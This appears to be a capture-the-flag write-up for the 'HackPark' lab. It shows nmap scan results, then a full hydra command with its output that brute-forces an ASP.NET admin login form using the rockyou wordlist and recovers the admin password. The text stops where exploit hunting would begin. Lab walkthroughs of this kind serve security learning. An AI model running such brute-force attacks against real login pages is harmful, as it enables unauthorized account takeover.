PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open ssl Microsoft SChannel TLS
| fingerprint-strings:
| TLSSessionReq:
| d])j
| hackpark0
| 220118035740Z
| 220720035740Z0
| hackpark0
| x&!LQ&RK
| ^r@TQ|;X
| V[%[
| <o}G
| \xff8
| Tr?0
| $0"0
| _Uh^
| *)[P
| _sTJ
|_ fzjW)
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2022-01-18T03:57:40
|_Not valid after: 2022-07-20T03:57:40
|_ssl-date: 2022-01-19T03:59:53+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.60%I=7%D=1/19%Time=61E78CAA%P=x86_64-pc-linux-gnu%r(TL
SF:SSessionReq,33C,"\x16\x03\x03\x037\x02\0\0M\x03\x03a\xe7\x8c\xa5\xd9\x9
SF:1y\xb9\xe0\x8fy\x04\n\xf4\x92d\]\)j\xf68\r\x11LY\x9b\xd9/t\xf6\xe3\r\x2
SF:0\(<\0\0@\xbdgc_\x04\x04\x08\x1d<\xab\xcf\x1e\xe9n~\xb8\^\x87\xc4\xe6%4
SF:\xeb\(\xde\x9f\xd0\0/\0\0\x05\xff\x01\0\x01\0\x0b\0\x02\xde\0\x02\xdb\0
SF:\x02\xd80\x82\x02\xd40\x82\x01\xbc\xa0\x03\x02\x01\x02\x02\x10B\x99t\(\
SF:xca\xae\xef\xaaI\x1f\xb0b\xef\xf8\x88\xb70\r\x06\t\*\x86H\x86\xf7\r\x01
SF:\x01\x05\x05\x000\x131\x110\x0f\x06\x03U\x04\x03\x13\x08hackpark0\x1e\x
SF:17\r220118035740Z\x17\r220720035740Z0\x131\x110\x0f\x06\x03U\x04\x03\x1
SF:3\x08hackpark0\x82\x01\"0\r\x06\t\*\x86H\x86\xf7\r\x01\x01\x01\x05\0\x0
SF:3\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\0\xcd/\x04\x8e&\+\xa7\xb1E
SF:\xda\xa2p\xc5\xf8\x16\xc0gS\xfe\xbdH\xef\xc5k\xaa\xe5\xb2\xb7\x08\x85\x
SF:bb\x81sgM\xb8\xd81\xa7x&!LQ&RK\x05\xd1\x9b\xa4\xb3\xc32\xe5\xb8\x03\x17
SF:\xbcu\xb7\x06\xfe\xc8ws\xca\xb8#Z\xef\xa3\x07&d\xa9\xffd\xf039\xf3\x1f\
SF:xef5\xf7/\xf5\xea\x8b\x07V`\xc1\xa6\xf2\x8f4\x02_\$U\xea\xec4\xbfJ>\x10
SF:\x146\xdd\xdah\x16\xde\x14\xeb\xf2\xc8O\x8e{\xcc\xc3\x15w\xca\xd8\xe2q\
SF:xa7\xc0d\x0c\^r@TQ\|;X\xefi\xc7\x96\xcd\x0fu\x06\xfb\xcb\0\$\x98V\[%\[\
SF:x07\xb3\xe4NFo\x01<o}G\xee\xf25\xb0\xa8\xed\xaa\xc5mrk\xfc\xec\xfb\xd8\
SF:xe2\xd0\xe8\xa4\(\xa4\x1b\xaa\xf5\xc7\x84\xf7u\x82u\]\xe3\\\xff8\xb4\x0
SF:1\xd9\x8cO\xcer\x11\xdbZ\xd7~6\x80\xa5U\x87\"\xb3\xbeTr\?0\x95\0/\xbe}Z
SF:\xe0\x80\xfb\xf5\xf4\xf4W\xc9RP\xb3p@\xd7\+\x97#\xf0\xaa\xfd\x02\x03\x0
SF:1\0\x01\xa3\$0\"0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08\+\x06\x01\x05\x0
SF:5\x07\x03\x010\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x0400\r\x06\t\*\x86
SF:H\x86\xf7\r\x01\x01\x05\x05\0\x03\x82\x01\x01\0/\xd7\xa6\xbbE\xcc\xdcU\
SF:xe0\xce\x8e\?\xaf\xa3O\xbc\x01\]\xa9;\xcf\t\xbf\x10\.'\x85\xcfy\x9d%,\x
SF:cf\xd3/\xb5\x0b\x87W\xd1\x02\x9d\xf4V\xe1o\(\xd0\x9d\xa7\x0cZ7\xd3\xa4A
SF:\xfa\x9f\xfa\xf7\x96\x90\xaaO\x19\x84\xa7\xdb@\xd45\+\"\xc7\xb3\xdc\xe1
SF:\xac\xe3\x1c\xa7\x7f\"C\xac\x8cg\x80\+\xe4\x17\x98\xeeSl\x96\xf4\x94\x1
SF:3B\xb7\xec\xd6\x93\x1b\x1em\x92lT\x8a\xac\$\xd3p\x87\xf1'\x08\x9a\x9a{<
SF:\xbb\x83\x8c\xb63B\xa6\xef\x12}\x8a\x17\xfd\x8e\x18\)\xd5\xcc\x88y\x8e\
SF:x93\xb5\xd0\xcc\xff\x8b\xf8\x88\xee\xe6\0a\x99Nj\xade\.\x0c\xdd0\xeb_Uh
SF:\^\x98D\xf5\x0f\xcb\*\)\[P\xf5\x20\x1f\x979\x83o\xab\xc00\xd5\xd1\x97O3
SF:\xa5\x83_sTJ\xa6\x0b\xcc\x16\xddV\xa5\[\xe2\x9e\x90\xccN\x9d\xac7\x07\x
SF:d9\x97\xb2\xcf\xaa/\xfd@\xc9\xcb\xa7n\xd8\xfeI\xf3QJ\xc5\x8e\x1c\x04-;\
SF:x19\xfb\xc4\xc2\x8c\]\xddM\x85\nfzjW\)\x0e\0\0\0");
MAC Address: 02:64:86:26:8A:A3 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms ip-10-10-202-97.eu-west-1.compute.internal (10.10.202.97)
hydra to crack the password for the login form.
Cracking password with Burpsuite and hydra.
Interecept the login traffic with proxy and burpuite and observe what's going on.
I could tell that the request was POST and needed some parameters to complete.
Hydra requires ^USER^ and ^PASS^ values along with the login failed option (you could use -s to show the success pattern, too), so I modified the command such as below.
hydra -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.202.97
http-post-form "/Account/login.aspx?ReturnURL=/admin/
:__VIEWSTATE=i%2Bx%2BpL85m1t4WpnjCku%2B0tFIMcIkXnh2eUsU72wnE0UzPkCK18CK
EpGgyzccugqMH5EJX3SzMu%2B%2F8D0eXCUJ1vlnIv94TXdUYIhQKcW%2Fn16BCmSOkqgoU
185z5871Osc0Ojw4WAV6cU58HYCFsxaEj%2FREdH%2BUPp5C%2FybBqenodpJE8G1&__
EVENTVALIDATION=zKCA0%2BYlVze28cv8jw6w%2FVTFl7oxWdI8mimzeKKwwlw7
QLoMFsukQP6FmFx1swzpP0ge9r2MJPtSuKecL3TCLHQ3e44aFQ08MxZC2xaCK8laX3WxAAAfB4v
HBFhEVexKfHOtpOPUqMlnYEasinUrcVmghftsPAdmeBaHmoAYlCpGINpf&ctl00%24MainCo
ntent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%
24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:
Login failed"
Hydra (http://www.thc.org/thc-hydra) starting at 2022-01-19 04:53:26
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.202.97:80//Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=i%2Bx%2BpL85m1t4WpnjCku%2B0tFIMcIkXnh2eUsU72wnE0UzPkCK18CKEpGgyzccugqMH5EJX3SzMu%2B%2F8D0eXCUJ1vlnIv94TXdUYIhQKcW%2Fn16BCmSOkqgoU185z5871Osc0Ojw4WAV6cU58HYCFsxaEj%2FREdH%2BUPp5C%2FybBqenodpJE8G1&__EVENTVALIDATION=zKCA0%2BYlVze28cv8jw6w%2FVTFl7oxWdI8mimzeKKwwlw7QLoMFsukQP6FmFx1swzpP0ge9r2MJPtSuKecL3TCLHQ3e44aFQ08MxZC2xaCK8laX3WxAAAfB4vHBFhEVexKfHOtpOPUqMlnYEasinUrcVmghftsPAdmeBaHmoAYlCpGINpf&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 736.00 tries/min, 736 tries in 00:01h, 14343662 to do in 324:49h, 16 active
[80][http-post-form] host: 10.10.202.97 login: admin password: PASS_WORD
[STATUS] attack finished for 10.10.202.97 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-01-19 04:55:38
This gave me the password for admin login.
Once you login, you want to identify the version of the webserver and see if there's any exploit.